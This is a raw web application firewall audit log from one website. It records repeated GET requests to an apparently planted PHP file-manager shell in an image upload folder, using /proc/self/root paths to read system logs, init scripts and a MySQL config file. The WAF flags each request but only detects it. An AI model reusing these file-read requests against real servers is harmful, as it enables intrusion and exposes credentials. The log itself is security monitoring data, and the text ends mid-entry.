HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2994 Connection: close Content-Type: text/html; charset=UTF-8 --0587a90d-H-- Message: Warning. Matched phrase "var/log/auth.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/auth.log found within ARGS:viewfile: /proc/thread-self/root/var/log/auth.log.2.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/auth.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/auth.log found within ARGS:viewfile: /proc/thread-self/root/var/log/auth.log.2.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBl7iid3pHxA3RhGpzl9AAAAAk"] Apache-Handler: application/x-httpd-php Stopwatch: 1750099438018800 5222 (- - -) Stopwatch2: 1750099438018800 5222; combined=2756, p1=449, p2=2142, p3=45, p4=42, p5=78, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0587a90d-Z-- --b2106749-A-- [17/Jun/2025:00:13:59.205635 +0530] aFBl7x6Azi2u_ik2Q3KkzgAAAAY 216.73.216.71 47484 127.0.0.1 7081 --b2106749-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fvar%2Flog&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fvar%2Flog%2Fmaillog HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --b2106749-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2989 Connection: close Content-Type: text/html; charset=UTF-8 --b2106749-H-- Message: Warning. Matched phrase "var/log/maillog" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/maillog found within ARGS:viewfile: /proc/thread-self/root/var/log/maillog"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/maillog" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/maillog found within ARGS:viewfile: /proc/thread-self/root/var/log/maillog"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBl7x6Azi2u_ik2Q3KkzgAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1750099439201155 4545 (- - -) Stopwatch2: 1750099439201155 4545; combined=2486, p1=392, p2=1949, p3=39, p4=39, p5=67, sr=113, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b2106749-Z-- --c3d20d4d-A-- [17/Jun/2025:00:14:25.770788 +0530] aFBmCRwcFb_n1P0IC9xhMwAAAAo 216.73.216.71 34650 127.0.0.1 7081 --c3d20d4d-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fvar%2Flog&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fvar%2Flog%2Fkern.log HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --c3d20d4d-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2990 Connection: close Content-Type: text/html; charset=UTF-8 --c3d20d4d-H-- Message: Warning. Matched phrase "var/log/kern.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/kern.log found within ARGS:viewfile: /proc/thread-self/root/var/log/kern.log"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/kern.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/kern.log found within ARGS:viewfile: /proc/thread-self/root/var/log/kern.log"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBmCRwcFb_n1P0IC9xhMwAAAAo"] Apache-Handler: application/x-httpd-php Stopwatch: 1750099465765701 5162 (- - -) Stopwatch2: 1750099465765701 5162; combined=2883, p1=428, p2=2286, p3=48, p4=44, p5=77, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c3d20d4d-Z-- --1e462c77-A-- [17/Jun/2025:00:14:26.043808 +0530] aFBmCpVkCcfT-Z8NQYyQqwAAAAc 216.73.216.71 34674 127.0.0.1 7081 --1e462c77-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fvar%2Flog&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fvar%2Flog%2Fmaillog.processed.3.gz HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --1e462c77-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3000 Connection: close Content-Type: text/html; charset=UTF-8 --1e462c77-H-- Message: Warning. Matched phrase "var/log/maillog" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/maillog found within ARGS:viewfile: /proc/thread-self/root/var/log/maillog.processed.3.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/maillog" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/maillog found within ARGS:viewfile: /proc/thread-self/root/var/log/maillog.processed.3.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBmCpVkCcfT-Z8NQYyQqwAAAAc"] Apache-Handler: application/x-httpd-php Stopwatch: 1750099466039621 4326 (- - -) Stopwatch2: 1750099466039621 4326; combined=2301, p1=414, p2=1754, p3=47, p4=33, p5=52, sr=104, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1e462c77-Z-- --97dff777-A-- [17/Jun/2025:00:14:27.862038 +0530] aFBmCxwcFb_n1P0IC9xhNgAAAAo 216.73.216.71 34904 127.0.0.1 7081 --97dff777-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fvar%2Flog&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fvar%2Flog%2Fsyslog HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --97dff777-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2988 Connection: close Content-Type: text/html; charset=UTF-8 --97dff777-H-- Message: Warning. Matched phrase "var/log/syslog" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/syslog found within ARGS:viewfile: /proc/thread-self/root/var/log/syslog"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/syslog" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/syslog found within ARGS:viewfile: /proc/thread-self/root/var/log/syslog"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBmCxwcFb_n1P0IC9xhNgAAAAo"] Apache-Handler: application/x-httpd-php Stopwatch: 1750099467857970 4124 (- - -) Stopwatch2: 1750099467857970 4124; combined=2159, p1=357, p2=1678, p3=35, p4=33, p5=56, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --97dff777-Z-- --bf018760-A-- [17/Jun/2025:00:14:34.595918 +0530] aFBmEo3q6eGJ2xNcTd6CqQAAAAU 216.73.216.71 43774 127.0.0.1 7081 --bf018760-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fvar%2Flog&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fvar%2Flog%2Fmaillog.processed.1.gz HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --bf018760-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3001 Connection: close Content-Type: text/html; charset=UTF-8 --bf018760-H-- Message: Warning. Matched phrase "var/log/maillog" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/maillog found within ARGS:viewfile: /proc/thread-self/root/var/log/maillog.processed.1.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/maillog" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/maillog found within ARGS:viewfile: /proc/thread-self/root/var/log/maillog.processed.1.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBmEo3q6eGJ2xNcTd6CqQAAAAU"] Apache-Handler: application/x-httpd-php Stopwatch: 1750099474591729 4253 (- - -) Stopwatch2: 1750099474591729 4253; combined=2300, p1=378, p2=1792, p3=41, p4=33, p5=56, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --bf018760-Z-- --da7f2540-A-- [17/Jun/2025:00:14:34.686891 +0530] aFBmEiid3pHxA3RhGpzmHQAAAAk 216.73.216.71 43778 127.0.0.1 7081 --da7f2540-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fvar%2Flog&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fvar%2Flog%2Fmaillog.processed.2.gz HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --da7f2540-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3001 Connection: close Content-Type: text/html; charset=UTF-8 --da7f2540-H-- Message: Warning. Matched phrase "var/log/maillog" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/maillog found within ARGS:viewfile: /proc/thread-self/root/var/log/maillog.processed.2.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/maillog" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/maillog found within ARGS:viewfile: /proc/thread-self/root/var/log/maillog.processed.2.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBmEiid3pHxA3RhGpzmHQAAAAk"] Apache-Handler: application/x-httpd-php Stopwatch: 1750099474682865 4080 (- - -) Stopwatch2: 1750099474682865 4080; combined=2252, p1=342, p2=1777, p3=37, p4=39, p5=57, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --da7f2540-Z-- --a25e5c06-A-- [17/Jun/2025:00:15:17.855588 +0530] aFBmPX3hoSwVUy254pHwPAAAACQ 216.73.216.71 35678 127.0.0.1 7081 --a25e5c06-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fsnap%2Fcore20%2F2599%2Fetc%2Finit.d&viewfile=%2F%2Fsnap%2Fcore20%2F2599%2Fetc%2Finit.d%2Fcryptdisks HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --a25e5c06-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3439 Connection: close Content-Type: text/html; charset=UTF-8 --a25e5c06-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /snap/core20/2599/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /snap/core20/2599/etc/init.d/cryptdisks"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /snap/core20/2599/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBmPX3hoSwVUy254pHwPAAAACQ"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /snap/core20/2599/etc/init.d/cryptdisks"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBmPX3hoSwVUy254pHwPAAAACQ"] Apache-Handler: application/x-httpd-php Stopwatch: 1750099517849913 5741 (- - -) Stopwatch2: 1750099517849913 5741; combined=2730, p1=437, p2=2108, p3=46, p4=37, p5=102, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a25e5c06-Z-- --d0ece135-A-- [17/Jun/2025:00:15:27.470100 +0530] aFBmRx6Azi2u_ik2Q3KlIgAAAAY 216.73.216.71 48444 127.0.0.1 7081 --d0ece135-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fvar%2Flog&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fvar%2Flog%2Fmail.err HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --d0ece135-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2989 Connection: close Content-Type: text/html; charset=UTF-8 --d0ece135-H-- Message: Warning. Matched phrase "var/log/mail.err" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/mail.err found within ARGS:viewfile: /proc/thread-self/root/var/log/mail.err"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/mail.err" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/mail.err found within ARGS:viewfile: /proc/thread-self/root/var/log/mail.err"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBmRx6Azi2u_ik2Q3KlIgAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1750099527466185 3993 (- - -) Stopwatch2: 1750099527466185 3993; combined=2156, p1=381, p2=1621, p3=35, p4=32, p5=87, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d0ece135-Z-- --edafde75-A-- [17/Jun/2025:00:17:07.494365 +0530] aFBmq03CmevS3xeTzmofdQAAAAQ 216.73.216.71 55864 127.0.0.1 7081 --edafde75-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fvar%2Flog&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fvar%2Flog%2Fmail.err.2.gz HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --edafde75-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2994 Connection: close Content-Type: text/html; charset=UTF-8 --edafde75-H-- Message: Warning. Matched phrase "var/log/mail.err" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/mail.err found within ARGS:viewfile: /proc/thread-self/root/var/log/mail.err.2.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/mail.err" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/mail.err found within ARGS:viewfile: /proc/thread-self/root/var/log/mail.err.2.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBmq03CmevS3xeTzmofdQAAAAQ"] Apache-Handler: application/x-httpd-php Stopwatch: 1750099627489254 5167 (- - -) Stopwatch2: 1750099627489254 5167; combined=2959, p1=391, p2=2420, p3=52, p4=38, p5=58, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --edafde75-Z-- --63f24c20-A-- [17/Jun/2025:00:17:56.502283 +0530] aFBm3H3hoSwVUy254pHwrQAAACQ 216.73.216.71 46210 127.0.0.1 7081 --63f24c20-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fvar%2Flog&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fvar%2Flog%2Fmail.err.4.gz HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --63f24c20-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2994 Connection: close Content-Type: text/html; charset=UTF-8 --63f24c20-H-- Message: Warning. Matched phrase "var/log/mail.err" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/mail.err found within ARGS:viewfile: /proc/thread-self/root/var/log/mail.err.4.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/mail.err" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/mail.err found within ARGS:viewfile: /proc/thread-self/root/var/log/mail.err.4.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBm3H3hoSwVUy254pHwrQAAACQ"] Apache-Handler: application/x-httpd-php Stopwatch: 1750099676496763 5613 (- - -) Stopwatch2: 1750099676496763 5613; combined=3167, p1=501, p2=2465, p3=49, p4=51, p5=101, sr=135, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --63f24c20-Z-- --75be230e-A-- [17/Jun/2025:00:18:02.558618 +0530] aFBm4h6Azi2u_ik2Q3KlkgAAAAY 216.73.216.71 44432 127.0.0.1 7081 --75be230e-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fmysql&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fmysql%2Fmy.cnf.fallback HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --75be230e-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3461 Connection: close Content-Type: text/html; charset=UTF-8 --75be230e-H-- Message: Warning. Matched phrase "etc/mysql/my.cnf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/mysql/my.cnf found within ARGS:viewfile: /proc/self/root/etc/mysql/my.cnf.fallback"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/mysql/my.cnf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/mysql/my.cnf found within ARGS:viewfile: /proc/self/root/etc/mysql/my.cnf.fallback"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBm4h6Azi2u_ik2Q3KlkgAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1750099682553493 5181 (- - -) Stopwatch2: 1750099682553493 5181; combined=2887, p1=393, p2=2349, p3=39, p4=41, p5=65, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --75be230e-Z-- --9ef91009-A-- [17/Jun/2025:00:18:06.559642 +0530] aFBm5iid3pHxA3RhGpzmvwAAAAk 216.73.216.71 45068 127.0.0.1 7081 --9ef91009-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fvar%2Flog&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fvar%2Flog%2Fsyslog.2.gz HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --9ef91009-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2992 Connection: close Content-Type: text/html; charset=UTF-8 --9ef91009-H-- Message: Warning. Matched phrase "var/log/syslog" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access 